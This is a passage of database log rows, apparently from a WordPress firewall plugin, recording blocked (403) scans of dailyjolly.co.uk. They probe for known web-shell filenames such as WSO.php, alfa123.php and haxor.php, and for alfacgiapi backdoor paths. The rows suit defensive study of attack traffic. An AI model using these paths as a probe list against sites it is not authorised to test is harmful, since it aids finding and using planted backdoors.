3.5.30729)\"}','gD9HP1ftscuk5AK3IjQnXM0Y',0,1674459309.7877,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','LAmGRlKrySb2vTOt1JidVB0f',0,1674459310.7049,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WTkwP1L3OYraSsqtVMnXfxKi',0,1674459311.5913,217,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hk10A8jqZXaBJRI2USbrMEwF',0,1674459312.5595,157,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xjW9q5OzZoHvGsSi76aFQP0c',0,1674459313.4260,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XKumxV7yT35grevztk8op4Ea',0,1674459314.3130,158,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','h8RkXtKZAJ7nsCW9eojD3LiV',0,1674459315.2146,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PsQ53wmGV6HDvqMbST4RuOZl',0,1674459316.1077,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','InfKwo9DZN7dCgPzMkXbSrmR',0,1674459316.9804,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4NkhGmP8wjtSoKdErQuYXBli',0,1674459317.8655,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','y4rRDqauet35zMCfEIiUjlO6',0,1674459318.7351,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1v4QYjIgWuCfNMbdpz6F5ZBG',0,1674459319.6149,159,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','T5yX3hJzqfuCm8wxisprnlja',0,1674459320.4877,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4Gmua2UDMkKbc8RvpAgBf6rV',0,1674459321.4064,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dpW6J5SqH02YivykVwjzMlsK',0,1674459322.2871,156,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ih7pH8oClxgAraj1yPGU6cBb',0,1674459323.1650,215,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NKRGbAgPJpnVakxOMIT1QYzw',0,1674459324.0949,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','L1cslwakXyi0Yj3M4EW5v9eo',0,1674459324.9648,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XjMF37lzbZ5ICnuy9SqOfxwd',0,1674459325.8305,195,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GCztKi3WpYwMd58UfalsT9c1',0,1674459326.7435,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SZjYHTR8iWOArsBoNufQtKkD',0,1674459327.6224,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vUdha3oyC0jpmTrBRz5kHM2b',0,1674459328.4859,157,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eolQ4SXiLPgszYyp3UEmdDf6',0,1674459329.3621,161,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GCwNLWDFlVKMpXqRr94vbt1s',0,1674459330.2355,189,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Mo3ah7irjCpWBHIF1vJ6qlQy',0,1674459331.1556,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EI6rtqe0gXGAFHzRNBW1pLJb',0,1674459332.0339,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NCfe5odyhTjKYw6HsF9g1R48',0,1674459332.9287,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Q3anGfmAVXrJqYMsv14IkeOu',0,1674459333.8227,196,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','AUNP6bh7YSg0uwLj4JBRroy2',0,1674459334.7587,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OQrB6DU8Z3aEizvoYI7wqn9V',0,1674459335.6542,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','X4xLBeVv6WOKlmAb31pPhJn8',0,1674459336.5319,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OvSDcXfE4zT8HBaAelPUKZo2',0,1674459337.4166,194,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','beRIF12kadV4Tz5tXvDKPGiW',0,1674459338.3197,157,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MgXTorZCkWc73BP8RNjHnpi1',0,1674474091.5505,192,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SYm46N3qPgLba5rFZxQUVpef',0,1674474091.9435,203,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','srblB7hefXZi2gSy9ADzNUxp',0,1674474092.3778,176,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zT3Vc0HKXUlCZPMhOpGm5896',0,1674474096.2585,191,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wFhI9xBZ6CcOD8JvqaTpjdGm',0,1674474096.7909,222,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','myh6Vq3wvlN1ckuHT92Go8SF',0,1674474097.3239,174,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','2jFN93Hlu6vGBsUoyeAhrdxK',0,1674474101.5519,180,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','lfd8R3iXEAJxtVpbqmzCPn1r',0,1674474102.0495,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','cqL1FKuUnxQ4dkVlWv7ibGmj',0,1674474102.4457,194,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','GWiEXkh279NaUOPbZLQevuJY',0,1674474107.8105,184,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','BxiCMVldZqLJ7UvXnoYahg2w',0,1674474108.2243,178,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','k8rsLBb5JM47z9h2vidZuDWX',0,1674474108.6351,239,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','TkGitg57vfaCeW3hOIQZcXwD',0,1674474113.5581,188,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','l8ZzfPNsrC06QOk9qHpiGD2A',0,1674474113.9531,180,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zouXZEdW56URLl1VgTAhQCGM',0,1674474114.3379,172,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','L7hI8XbjGT4FDd3ziomkPEtl',0,1674474119.2717,268,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kHs6iv5uIdF3BJtcWEARKeL4',0,1674474119.7470,186,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','mW87KLpeldw03QM2aNHC164y',0,1674474120.1591,203,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','7lEdZkRmngi8bWvIPHDKcCSq',0,1674474124.4645,178,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8cDzhF1aBqZ26SxfL39ljtnk',0,1674474124.8514,184,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pPRKE5d2B8bOrSIJljo1QYh0',0,1674474125.2397,206,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Hg8QFfmVJrGSq2On0bNo4ABW',0,1674474129.9436,211,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','qJ2s6iBoU0vTewkGLXNuSIPz',0,1674474130.4388,191,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','uYT0EN38R4X2wPKHabvUcSWt',0,1674474130.8442,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','OZb0A8akmEzevBgF3iVKDljy',0,1674474135.9586,169,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','y2J7G9t53roTjecnp4MEPmDH',0,1674474136.3985,170,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','L978ronMXxWTH5is1lVKfZz4',0,1674474136.7698,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','dMto4yDN7UEV6pcR1ifkjABG',0,1674474140.7274,180,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','PK6aXjRQ7L3xWFBNprnlEtTv',0,1674474141.1328,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','bTrMwP3j5uXm8zAil09NdJHy',0,1674474141.5143,170,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','32uUbxtNXjLohDkT7yqawOZ0',0,1674474146.1110,217,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','vsFK2fdhDqglpZG4cz0mXUEO',0,1674474146.6264,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KECM78eVuJrgtc1IfNkynaiH',0,1674474147.0717,212,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','bd0ZFOaYpszlmxS6X4K9VnGy',0,1674474151.8098,205,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','w01ORQrCPXbz8FjfkvGL9hgD',0,1674474152.2304,257,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DOrMl4H8TIA3yJh6Rv1Bjup2',0,1674474152.8408,169,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp-content/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; 